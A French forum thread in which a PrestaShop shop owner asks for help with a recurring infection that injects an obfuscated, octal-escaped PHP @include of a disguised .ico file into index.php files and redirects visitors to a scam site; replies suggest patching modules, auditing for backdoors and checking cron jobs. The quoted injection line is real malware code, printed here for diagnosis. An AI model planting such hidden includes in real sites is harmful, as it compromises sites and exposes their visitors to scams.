Jump to content

Recommended Posts

Bonjour

J'ai depuis quelques temps un malware dont je n'arrive pas à me débarrasser et surtout trouver son origine.

 

Il rajoute régulièrement dans de nombreux fichiers index.php les lignes suivantes :

 

/*a0449*/

@include "\057hom\145/ma\147ied\151rhw\057mag\151edi\162ect\145-di\147ita\154e.c\157m/m\157dul\145s/g\141mif\151cat\151on/\143las\163es/\0563fc\142fe4\145.ic\157";

/*a0449*/
 

en début de script j'ai eu beau supprimer les .ico crée et mettre à jour tous les fichiers index infectés, changer mon mdp FTP et BDD rien n'y fait car je ne trouve pas ou il est caché le malware crée meme des fichiers index complémentaires avec juste ces ligens de codes. Pouvez vous m'aider à identifier son origine afin que je puisse m'en débarraser définitivement.

 

L'impact est que cela crée une redirection sur mon site vers un site de gain d'iphone ou autre ….

 

Merci pour votre retour

Pierre

index.php

Share this post


Link to post
Share on other sites

Quelle est votre version de Prestashop ?

Vous avez très probablement un module vulnérable qu’il va falloir patcher ou désinstaller pour fermer la porte d’entrée

Share this post


Link to post
Share on other sites

Avez-vous WordPress installé sur le même serveur?
Avez-vous installé un module "pirate"?

Share this post


Link to post
Share on other sites

C'est je pense le moment de faire intervenir quelqu'un qui inspecte la totalité de ton code pour identifier les failles initiales mais aussi les backdoor qui ont été implantés.

C'est plusieurs heures de taf quand on a l'habitude

 

Share this post


Link to post
Share on other sites
28 minutes ago, Janett said:

Quelle est votre version de Prestashop ?

Vous avez très probablement un module vulnérable qu’il va falloir patcher ou désinstaller pour fermer la porte d’entrée

Merci Janett pour votre retour rapide je suis en version 1.7.5.2 tous mes modules sont pourtant à jour

Share this post


Link to post
Share on other sites
8 minutes ago, joseantgv said:

Avez-vous WordPress installé sur le même serveur?
Avez-vous installé un module "pirate"?

Bonjour oui j'ai un wordpress également sur le même serveur avec un wordfence qui m'a aussi permis de nettoyer totalement ce site mais je ne trouve pas son équivalent sous prestashop et non aucun module pirate d'installer en tout cas à ma connaissance

Share this post


Link to post
Share on other sites
8 minutes ago, doekia said:

C'est je pense le moment de faire intervenir quelqu'un qui inspecte la totalité de ton code pour identifier les failles initiales mais aussi les backdoor qui ont été implantés.

C'est plusieurs heures de taf quand on a l'habitude

 

Merci pour votre retour, il n'existe pas d'autres solutions qu'une inspection totale du code car en effet cela semble très long... seriez vous capable de me proposer ce type de prestation?

Share this post


Link to post
Share on other sites

J'ai été piratée et ils avaient installé des tâches CRON qui tripotaient mes fichiers régulièrement (je m'en suis rendue compte par hasard ; mon technicien n'avait pas pensé à regarder ça).
 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More